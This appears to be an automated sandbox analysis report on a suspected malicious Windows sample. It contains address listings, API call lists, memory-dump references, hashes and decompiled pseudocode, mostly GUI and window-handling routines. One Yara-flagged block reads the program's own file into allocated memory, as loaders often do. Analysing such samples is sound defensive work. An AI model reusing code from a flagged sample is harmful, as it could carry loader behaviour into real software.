                                                                                                                                                                                                                                                                                          0x001025d0
                                                                                                                                                                                                                                                                                          0x001025d6
                                                                                                                                                                                                                                                                                          0x001025dd
                                                                                                                                                                                                                                                                                          0x001025d8
                                                                                                                                                                                                                                                                                          0x001025d8
                                                                                                                                                                                                                                                                                          0x001025d8
                                                                                                                                                                                                                                                                                          0x001025e0
                                                                                                                                                                                                                                                                                          0x001025e0
                                                                                                                                                                                                                                                                                          0x001025ea
                                                                                                                                                                                                                                                                                          0x001025ef
                                                                                                                                                                                                                                                                                          0x001025f5
                                                                                                                                                                                                                                                                                          0x00102607
                                                                                                                                                                                                                                                                                          0x001025f7
                                                                                                                                                                                                                                                                                          0x001025f8
                                                                                                                                                                                                                                                                                          0x001025f8
                                                                                                                                                                                                                                                                                          0x001025f5
                                                                                                                                                                                                                                                                                          0x0010260c
                                                                                                                                                                                                                                                                                          0x00102613
                                                                                                                                                                                                                                                                                          0x00102624
                                                                                                                                                                                                                                                                                          0x00102627
                                                                                                                                                                                                                                                                                          0x00102630
                                                                                                                                                                                                                                                                                          0x00102632
                                                                                                                                                                                                                                                                                          0x0010263b
                                                                                                                                                                                                                                                                                          0x0010263e
                                                                                                                                                                                                                                                                                          0x0010265b
                                                                                                                                                                                                                                                                                          0x0010265d
                                                                                                                                                                                                                                                                                          0x0010265d
                                                                                                                                                                                                                                                                                          0x00102664
                                                                                                                                                                                                                                                                                          0x00102640
                                                                                                                                                                                                                                                                                          0x00102642
                                                                                                                                                                                                                                                                                          0x00102650
                                                                                                                                                                                                                                                                                          0x00102650
                                                                                                                                                                                                                                                                                          0x00102653
                                                                                                                                                                                                                                                                                          0x00102653
                                                                                                                                                                                                                                                                                          0x00102668
                                                                                                                                                                                                                                                                                          0x0010266b
                                                                                                                                                                                                                                                                                          0x00102670
                                                                                                                                                                                                                                                                                          0x0010267a
                                                                                                                                                                                                                                                                                          0x00102672
                                                                                                                                                                                                                                                                                          0x00102675
                                                                                                                                                                                                                                                                                          0x00102675
                                                                                                                                                                                                                                                                                          0x0010269a
                                                                                                                                                                                                                                                                                          0x001026be
                                                                                                                                                                                                                                                                                          0x001026c3
                                                                                                                                                                                                                                                                                          0x00102751
                                                                                                                                                                                                                                                                                          0x001026c9
                                                                                                                                                                                                                                                                                          0x001026cd
                                                                                                                                                                                                                                                                                          0x001026ea
                                                                                                                                                                                                                                                                                          0x001026ed
                                                                                                                                                                                                                                                                                          0x001026cf
                                                                                                                                                                                                                                                                                          0x001026cf
                                                                                                                                                                                                                                                                                          0x001026d6
                                                                                                                                                                                                                                                                                          0x001026d6
                                                                                                                                                                                                                                                                                          0x001026fc
                                                                                                                                                                                                                                                                                          0x001026ff
                                                                                                                                                                                                                                                                                          0x00102704
                                                                                                                                                                                                                                                                                          0x0010270b
                                                                                                                                                                                                                                                                                          0x00102706
                                                                                                                                                                                                                                                                                          0x00102706
                                                                                                                                                                                                                                                                                          0x00102706
                                                                                                                                                                                                                                                                                          0x00102706
                                                                                                                                                                                                                                                                                          0x00102720
                                                                                                                                                                                                                                                                                          0x00102725
                                                                                                                                                                                                                                                                                          0x00102736
                                                                                                                                                                                                                                                                                          0x00102736
                                                                                                                                                                                                                                                                                          0x00102746
                                                                                                                                                                                                                                                                                          0x00102746
                                                                                                                                                                                                                                                                                          0x0010269c
                                                                                                                                                                                                                                                                                          0x001026ae
                                                                                                                                                                                                                                                                                          0x001026bb
                                                                                                                                                                                                                                                                                          0x001026bb

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000434,00000000,000F6D4C), ref: 001025C0
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 00102630
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 0010264E
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000044F,000000FE,?), ref: 00102695
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000437,00000000,?), ref: 001026AE
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 001026E5
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 001026FA
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000044F,000000FE,?), ref: 0010271E
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000437,00000000,?), ref: 00102736
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                          • Opcode ID: d0d823df6411082f04776708eedffaf2a85ae19f2f138608c8d50fb86ab8ac27
                                                                                                                                                                                                                                                                                          • Instruction ID: 26c7fd8108a2f1dd6fecceb204a47feb11face49c091f2080cff07df2c2ab42a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0d823df6411082f04776708eedffaf2a85ae19f2f138608c8d50fb86ab8ac27
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1617271A00209EFDB14CF65CC85BAEB7F4AB48710F218669E955EB2C0D7B5D941CB90
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000208), ref: 02525D33
                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02525D52
                                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 02525D74
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 02525D9D
                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 02525DDE
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 02525E05
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02525E56
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02525F87
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02525FA7
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: File$Virtual$CloseFreeHandle$AllocCreateModuleNameReadSize
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2587706029-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 063b05f48eae33b258ee2420aae3456a1780917d8fa45e881b3f78093d36c6e2
                                                                                                                                                                                                                                                                                          • Instruction ID: 77e122a446dad954a0322f70822b9bb7c8f74760c4c3f1c3f5533cbfc26851f9
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 063b05f48eae33b258ee2420aae3456a1780917d8fa45e881b3f78093d36c6e2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4814A709056289BDB28CF14DC94BAABBB5FF49306F4081D9E508AB2C1E7789BC5CF54
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                                                                                                                          			E00103450(struct HWND__* __ecx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v24;
                                                                                                                                                                                                                                                                                          				void* _v28;
                                                                                                                                                                                                                                                                                          				void* _v32;
                                                                                                                                                                                                                                                                                          				struct tagPOINT _v40;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v44;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t41;
                                                                                                                                                                                                                                                                                          				intOrPtr _t43;
                                                                                                                                                                                                                                                                                          				intOrPtr _t54;
                                                                                                                                                                                                                                                                                          				int _t55;
                                                                                                                                                                                                                                                                                          				int _t59;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t66;
                                                                                                                                                                                                                                                                                          				void* _t67;
                                                                                                                                                                                                                                                                                          				intOrPtr _t75;
                                                                                                                                                                                                                                                                                          				intOrPtr _t76;
                                                                                                                                                                                                                                                                                          				intOrPtr _t87;
                                                                                                                                                                                                                                                                                          				void* _t92;
                                                                                                                                                                                                                                                                                          				void* _t94;
                                                                                                                                                                                                                                                                                          				void* _t95;
                                                                                                                                                                                                                                                                                          				int _t96;
                                                                                                                                                                                                                                                                                          				signed int _t97;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t99 = (_t97 & 0xfffffff8) - 0x2c;
                                                                                                                                                                                                                                                                                          				_t41 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t41 ^ (_t97 & 0xfffffff8) - 0x0000002c;
                                                                                                                                                                                                                                                                                          				_t43 = _a4;
                                                                                                                                                                                                                                                                                          				_v44 = __ecx;
                                                                                                                                                                                                                                                                                          				if(_t43 == 0) {
                                                                                                                                                                                                                                                                                          					_t94 = 0;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t94 = _t43 - 0x24;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t5 = _t94 + 4; // 0xffffff00
                                                                                                                                                                                                                                                                                          				_v32 = 0;
                                                                                                                                                                                                                                                                                          				_v28 = 0;
                                                                                                                                                                                                                                                                                          				SendMessageA( *_t5, 0xb0,  &_v32,  &_v28);
                                                                                                                                                                                                                                                                                          				_t11 = _t94 + 4; // 0xffffff00
                                                                                                                                                                                                                                                                                          				_v40.x = 0;
                                                                                                                                                                                                                                                                                          				_v40.y = 0;
                                                                                                                                                                                                                                                                                          				SendMessageA( *_t11, 0xd6,  &_v40, _v32);
                                                                                                                                                                                                                                                                                          				_t15 = _t94 + 4; // 0xffffff00
                                                                                                                                                                                                                                                                                          				ClientToScreen(GetParent( *_t15),  &_v40);
                                                                                                                                                                                                                                                                                          				_t66 = _v44;
                                                                                                                                                                                                                                                                                          				_v24.left = 0;
                                                                                                                                                                                                                                                                                          				_v24.top = 0;
                                                                                                                                                                                                                                                                                          				_v24.right = 0;
                                                                                                                                                                                                                                                                                          				_v24.bottom = 0;
                                                                                                                                                                                                                                                                                          				GetWindowRect(_t66,  &_v24);
                                                                                                                                                                                                                                                                                          				_push(_v40.y);
                                                                                                                                                                                                                                                                                          				_t84 =  &_v24;
                                                                                                                                                                                                                                                                                          				if(PtInRect( &_v24, _v40) != 0) {
                                                                                                                                                                                                                                                                                          					_t75 = _v24.bottom;
                                                                                                                                                                                                                                                                                          					_t54 = _v40.y;
                                                                                                                                                                                                                                                                                          					if(_t54 <= _t75 - _v24.top) {
                                                                                                                                                                                                                                                                                          						_t55 = GetSystemMetrics(1);
                                                                                                                                                                                                                                                                                          						_t87 = _v24.bottom;
                                                                                                                                                                                                                                                                                          						_t96 = _v24.top;
                                                                                                                                                                                                                                                                                          						_t76 = _v40.y;
                                                                                                                                                                                                                                                                                          						_v44 = _t55;
                                                                                                                                                                                                                                                                                          						if(_t87 - _t96 + _t76 < _v44) {
                                                                                                                                                                                                                                                                                          							OffsetRect( &_v24, 0, _t76 - _t96 + 0x28);
                                                                                                                                                                                                                                                                                          							goto L8;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						OffsetRect( &_v24, 0, _t54 - _t75 - 0x14);
                                                                                                                                                                                                                                                                                          						L8:
                                                                                                                                                                                                                                                                                          						_t96 = _v24.top;
                                                                                                                                                                                                                                                                                          						_t87 = _v24.bottom;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t59 = _v24.left;
                                                                                                                                                                                                                                                                                          					_t84 = _v24.right - _t59;
                                                                                                                                                                                                                                                                                          					_t52 = MoveWindow(_t66, _t59, _t96, _v24.right - _t59, _t87 - _t96, 1);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_pop(_t92);
                                                                                                                                                                                                                                                                                          				_pop(_t95);
                                                                                                                                                                                                                                                                                          				_pop(_t67);
                                                                                                                                                                                                                                                                                          				return E001059E6(_t52, _t67, _v8 ^ _t99, _t84, _t92, _t95);
                                                                                                                                                                                                                                                                                          			}



























                                                                                                                                                                                                                                                                                          0x00103456
                                                                                                                                                                                                                                                                                          0x00103459
                                                                                                                                                                                                                                                                                          0x00103460
                                                                                                                                                                                                                                                                                          0x00103464
                                                                                                                                                                                                                                                                                          0x0010346c
                                                                                                                                                                                                                                                                                          0x00103472
                                                                                                                                                                                                                                                                                          0x00103479
                                                                                                                                                                                                                                                                                          0x00103474
                                                                                                                                                                                                                                                                                          0x00103474
                                                                                                                                                                                                                                                                                          0x00103474
                                                                                                                                                                                                                                                                                          0x0010347b
                                                                                                                                                                                                                                                                                          0x00103494
                                                                                                                                                                                                                                                                                          0x00103498
                                                                                                                                                                                                                                                                                          0x0010349c
                                                                                                                                                                                                                                                                                          0x001034a2
                                                                                                                                                                                                                                                                                          0x001034b1
                                                                                                                                                                                                                                                                                          0x001034b5
                                                                                                                                                                                                                                                                                          0x001034b9
                                                                                                                                                                                                                                                                                          0x001034bb
                                                                                                                                                                                                                                                                                          0x001034cb
                                                                                                                                                                                                                                                                                          0x001034d1
                                                                                                                                                                                                                                                                                          0x001034db
                                                                                                                                                                                                                                                                                          0x001034df
                                                                                                                                                                                                                                                                                          0x001034e3
                                                                                                                                                                                                                                                                                          0x001034e7
                                                                                                                                                                                                                                                                                          0x001034eb
                                                                                                                                                                                                                                                                                          0x001034f9
                                                                                                                                                                                                                                                                                          0x001034fb
                                                                                                                                                                                                                                                                                          0x00103508
                                                                                                                                                                                                                                                                                          0x0010350a
                                                                                                                                                                                                                                                                                          0x0010350e
                                                                                                                                                                                                                                                                                          0x0010351a
                                                                                                                                                                                                                                                                                          0x0010352c
                                                                                                                                                                                                                                                                                          0x00103532
                                                                                                                                                                                                                                                                                          0x00103536
                                                                                                                                                                                                                                                                                          0x0010353a
                                                                                                                                                                                                                                                                                          0x0010353e
                                                                                                                                                                                                                                                                                          0x0010354c
                                                                                                                                                                                                                                                                                          0x0010355a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010355a
                                                                                                                                                                                                                                                                                          0x0010351c
                                                                                                                                                                                                                                                                                          0x0010355a
                                                                                                                                                                                                                                                                                          0x0010355a
                                                                                                                                                                                                                                                                                          0x00103560
                                                                                                                                                                                                                                                                                          0x00103564
                                                                                                                                                                                                                                                                                          0x00103564
                                                                                                                                                                                                                                                                                          0x00103568
                                                                                                                                                                                                                                                                                          0x00103575
                                                                                                                                                                                                                                                                                          0x0010357b
                                                                                                                                                                                                                                                                                          0x0010357b
                                                                                                                                                                                                                                                                                          0x00103585
                                                                                                                                                                                                                                                                                          0x00103586
                                                                                                                                                                                                                                                                                          0x00103587
                                                                                                                                                                                                                                                                                          0x00103592

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,000000B0,?,?), ref: 0010349C
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,000000D6,?,?), ref: 001034B9
                                                                                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 001034BF
                                                                                                                                                                                                                                                                                          • ClientToScreen.USER32(00000000,?), ref: 001034CB
                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32 ref: 001034EB
                                                                                                                                                                                                                                                                                          • PtInRect.USER32(?,?,?), ref: 00103500
                                                                                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 0010352C
                                                                                                                                                                                                                                                                                          • OffsetRect.USER32(?,00000000,?), ref: 0010355A
                                                                                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,000F6D4C,?,?,?), ref: 0010357B
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Rect$MessageSendWindow$ClientMetricsMoveOffsetParentScreenSystem
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 126033273-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 2bcee5359d84470d431c7d257e6403c1822120abab16e0afb7af3942e8c17a4e
                                                                                                                                                                                                                                                                                          • Instruction ID: 81d3639406458f82b06b9254503eaacf337aee81f68ce38baec027876ead25fb
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2bcee5359d84470d431c7d257e6403c1822120abab16e0afb7af3942e8c17a4e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9341E6B5618301AFC305CF29D98486BBBE9FBDC714F008A0DF99593654D770EA85CBA2
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                                                                                                          			E000FF2D0(long* __ebx, struct HWND__* __ecx) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                                          				signed char _v20;
                                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                                          				void* _v28;
                                                                                                                                                                                                                                                                                          				signed int _v32;
                                                                                                                                                                                                                                                                                          				void* _v36;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t37;
                                                                                                                                                                                                                                                                                          				unsigned int _t39;
                                                                                                                                                                                                                                                                                          				signed short _t41;
                                                                                                                                                                                                                                                                                          				intOrPtr _t52;
                                                                                                                                                                                                                                                                                          				signed int _t57;
                                                                                                                                                                                                                                                                                          				long* _t63;
                                                                                                                                                                                                                                                                                          				struct tagPOINT _t65;
                                                                                                                                                                                                                                                                                          				int _t78;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t80;
                                                                                                                                                                                                                                                                                          				signed int _t81;
                                                                                                                                                                                                                                                                                          				void* _t84;
                                                                                                                                                                                                                                                                                          				void* _t85;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t63 = __ebx;
                                                                                                                                                                                                                                                                                          				_t37 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t37 ^ _t81;
                                                                                                                                                                                                                                                                                          				_t80 = __ecx;
                                                                                                                                                                                                                                                                                          				_t39 = GetMessagePos();
                                                                                                                                                                                                                                                                                          				_t65 = _t39;
                                                                                                                                                                                                                                                                                          				_t41 = _t39 >> 0x10;
                                                                                                                                                                                                                                                                                          				 *__ebx = 0;
                                                                                                                                                                                                                                                                                          				_v36 = _t65;
                                                                                                                                                                                                                                                                                          				_v32 = _t41;
                                                                                                                                                                                                                                                                                          				if(( *(_t80 + 0x84) & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                          					ScreenToClient( *(_t80 + 4),  &_v36);
                                                                                                                                                                                                                                                                                          					L14:
                                                                                                                                                                                                                                                                                          					 *0x170bc0 = _v36;
                                                                                                                                                                                                                                                                                          					 *0x170bc4 = _v32;
                                                                                                                                                                                                                                                                                          					return E001059E6(0, _t63, _v8 ^ _t81, _v32, _t78, _t80);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t78 =  *(_t80 + 4);
                                                                                                                                                                                                                                                                                          				_push(_t41);
                                                                                                                                                                                                                                                                                          				if(WindowFromPoint(_t65) != _t78) {
                                                                                                                                                                                                                                                                                          					goto L14;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				ScreenToClient(_t78,  &_v36);
                                                                                                                                                                                                                                                                                          				_t78 = SendMessageA( *(_t80 + 4), 0x445, 0,  &_v36);
                                                                                                                                                                                                                                                                                          				_t84 = _v36 -  *0x170bc0; // 0xffffffff
                                                                                                                                                                                                                                                                                          				if(_t84 != 0) {
                                                                                                                                                                                                                                                                                          					L4:
                                                                                                                                                                                                                                                                                          					if(_t78 >= 0 && _t78 < GetMenuItemCount( *(_t80 + 0x44))) {
                                                                                                                                                                                                                                                                                          						_t52 =  *((intOrPtr*)(_t80 + 0x88));
                                                                                                                                                                                                                                                                                          						if(_t78 != _t52 && _t52 != 0xffffffff) {
                                                                                                                                                                                                                                                                                          							_v28 = 0;
                                                                                                                                                                                                                                                                                          							_v24 = 0;
                                                                                                                                                                                                                                                                                          							_v20 = 0;
                                                                                                                                                                                                                                                                                          							_v16 = 0;
                                                                                                                                                                                                                                                                                          							_v12 = 0;
                                                                                                                                                                                                                                                                                          							SendMessageA( *(_t80 + 4), 0x417, _t78,  &_v28);
                                                                                                                                                                                                                                                                                          							if((_v20 & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                          								 *(_t80 + 0x8c) = _t78 | 0xffff0000;
                                                                                                                                                                                                                                                                                          								_t57 =  *((intOrPtr*)(_t80 + 0xc)) - 1;
                                                                                                                                                                                                                                                                                          								if(_t57 >= 0) {
                                                                                                                                                                                                                                                                                          									_t80 =  *( *((intOrPtr*)(_t80 + 8)) + _t57 * 4);
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t80 = 0;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t78 = PostMessageA;
                                                                                                                                                                                                                                                                                          								PostMessageA(_t80, 0x202, 0, (_v32 & 0x0000ffff) << 0x00000010 | _v36 & 0x0000ffff);
                                                                                                                                                                                                                                                                                          								PostMessageA(_t80, 0x100, 0x1b, 0);
                                                                                                                                                                                                                                                                                          								 *_t63 = 1;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L14;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t85 = _v32 -  *0x170bc4; // 0xffffffff
                                                                                                                                                                                                                                                                                          				if(_t85 == 0) {
                                                                                                                                                                                                                                                                                          					goto L14;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				goto L4;
                                                                                                                                                                                                                                                                                          			}

























                                                                                                                                                                                                                                                                                          0x000ff2d0
                                                                                                                                                                                                                                                                                          0x000ff2d6
                                                                                                                                                                                                                                                                                          0x000ff2dd
                                                                                                                                                                                                                                                                                          0x000ff2e2
                                                                                                                                                                                                                                                                                          0x000ff2e4
                                                                                                                                                                                                                                                                                          0x000ff2ea
                                                                                                                                                                                                                                                                                          0x000ff2f0
                                                                                                                                                                                                                                                                                          0x000ff2f1
                                                                                                                                                                                                                                                                                          0x000ff2fe
                                                                                                                                                                                                                                                                                          0x000ff301
                                                                                                                                                                                                                                                                                          0x000ff304
                                                                                                                                                                                                                                                                                          0x000ff40b
                                                                                                                                                                                                                                                                                          0x000ff411
                                                                                                                                                                                                                                                                                          0x000ff417
                                                                                                                                                                                                                                                                                          0x000ff423
                                                                                                                                                                                                                                                                                          0x000ff434
                                                                                                                                                                                                                                                                                          0x000ff434
                                                                                                                                                                                                                                                                                          0x000ff30a
                                                                                                                                                                                                                                                                                          0x000ff30d
                                                                                                                                                                                                                                                                                          0x000ff317
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000ff322
                                                                                                                                                                                                                                                                                          0x000ff33d
                                                                                                                                                                                                                                                                                          0x000ff342
                                                                                                                                                                                                                                                                                          0x000ff348
                                                                                                                                                                                                                                                                                          0x000ff359
                                                                                                                                                                                                                                                                                          0x000ff35b
                                                                                                                                                                                                                                                                                          0x000ff373
                                                                                                                                                                                                                                                                                          0x000ff37b
                                                                                                                                                                                                                                                                                          0x000ff38f
                                                                                                                                                                                                                                                                                          0x000ff392
                                                                                                                                                                                                                                                                                          0x000ff395
                                                                                                                                                                                                                                                                                          0x000ff398
                                                                                                                                                                                                                                                                                          0x000ff39b
                                                                                                                                                                                                                                                                                          0x000ff3a9
                                                                                                                                                                                                                                                                                          0x000ff3b3
                                                                                                                                                                                                                                                                                          0x000ff3bb
                                                                                                                                                                                                                                                                                          0x000ff3c4
                                                                                                                                                                                                                                                                                          0x000ff3c5
                                                                                                                                                                                                                                                                                          0x000ff3ce
                                                                                                                                                                                                                                                                                          0x000ff3c7
                                                                                                                                                                                                                                                                                          0x000ff3c7
                                                                                                                                                                                                                                                                                          0x000ff3c7
                                                                                                                                                                                                                                                                                          0x000ff3d9
                                                                                                                                                                                                                                                                                          0x000ff3ed
                                                                                                                                                                                                                                                                                          0x000ff3f9
                                                                                                                                                                                                                                                                                          0x000ff3fb
                                                                                                                                                                                                                                                                                          0x000ff3fb
                                                                                                                                                                                                                                                                                          0x000ff3b3
                                                                                                                                                                                                                                                                                          0x000ff37b
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000ff35b
                                                                                                                                                                                                                                                                                          0x000ff34d
                                                                                                                                                                                                                                                                                          0x000ff353
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetMessagePos.USER32 ref: 000FF2E4
                                                                                                                                                                                                                                                                                          • WindowFromPoint.USER32(?,00000000), ref: 000FF30F
                                                                                                                                                                                                                                                                                          • ScreenToClient.USER32 ref: 000FF322
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000445,00000000,?), ref: 000FF337
                                                                                                                                                                                                                                                                                          • GetMenuItemCount.USER32 ref: 000FF365
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000417,00000000,?), ref: 000FF3A9
                                                                                                                                                                                                                                                                                          • PostMessageA.USER32 ref: 000FF3ED
                                                                                                                                                                                                                                                                                          • PostMessageA.USER32 ref: 000FF3F9
                                                                                                                                                                                                                                                                                          • ScreenToClient.USER32 ref: 000FF40B
                                                                                                                                                                                                                                                                                          Memory Dump Source
